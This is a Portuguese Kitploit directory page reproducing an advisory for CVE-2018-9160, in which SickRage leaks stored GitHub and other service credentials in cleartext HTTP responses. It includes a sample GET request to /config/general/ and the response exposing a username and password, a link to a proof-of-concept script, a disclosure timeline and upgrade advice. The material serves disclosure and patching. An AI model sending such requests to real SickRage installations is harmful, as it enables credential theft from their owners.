Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
sickrageWTF — CVE-2018-9160 | Kitploit
Ferramentas/GitHubGitHub/mechanico/sickragewtf
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubmechanico/sickragewtf

sickrageWTF

CVE-2018-9160

Ver Repositório
há 8 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Credenciais do GitHub em texto claro no Sickrage CVE-2018-9160


  1. Sobre

Título do Exploit: Credenciais em texto claro do SickRage na resposta HTTP
Data: 2018-04-01
Autor do Exploit: Sven Fassbender
Contato: https://twitter.com/mezdanak
Página do fornecedor: https://sickrage.github.io
Link do software: https://github.com/SickRage/SickRage
Versão: < v2018.03.09-1
CVE: CVE-2018-9160
Categoria: webapps


  1. Informações gerais

"O SickRage é um gerenciador automático de biblioteca de vídeos para séries de TV.
Ele observa novos episódios das suas séries favoritas e, quando eles são publicados, faz a sua mágica:
busca automática de torrents/nzb, download e processamento nas qualidades que você quiser." --trecho de https://sickrage.github.io


  1. Descrição da vulnerabilidade

O SickRage retorna credenciais em texto claro para, por exemplo, GitHub, AniDB, Kodi, Plex etc. em respostas HTTP.
O pré-requisito é que o usuário não tenha definido nome de usuário e senha para a sua instalação do SickRage. (não obrigatório, padrão)

Requisição HTTP:

root@kitploit:~
GET /config/general/ HTTP/1.1  
Host: 192.168.1.13:8081  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.13:8081/config/backuprestore/  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  

Resposta HTTP:

root@kitploit:~
HTTP/1.1 200 OK  
Content-Length: 113397  
Vary: Accept-Encoding  
Server: TornadoServer/4.5.1  
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"  
Date: Fri, 02 Mar 2018 10:47:51 GMT  
Content-Type: text/html; charset=UTF-8  

<!DOCTYPE html>  
<html lang="nl_NL">  
    <head>  
		[...]  
        <input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />  
        [...]  
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />  
		[...]  
        </div>  
    </body>  
</html>  

  1. Prova de Conceito

https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py


  1. Linha do tempo

[2018-03-07] Vulnerabilidade descoberta
[2018-03-08] Fornecedor contatado
[2018-03-08] Fornecedor respondeu
[2018-03-09] Vulnerabilidade corrigida. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)


  1. Recomendação

Atualize a instalação do SickRage para a versão v2018.03.09-1 ou posterior.
Proteja o acesso à aplicação web com credenciais de usuário adequadas.


Baixar ferramenta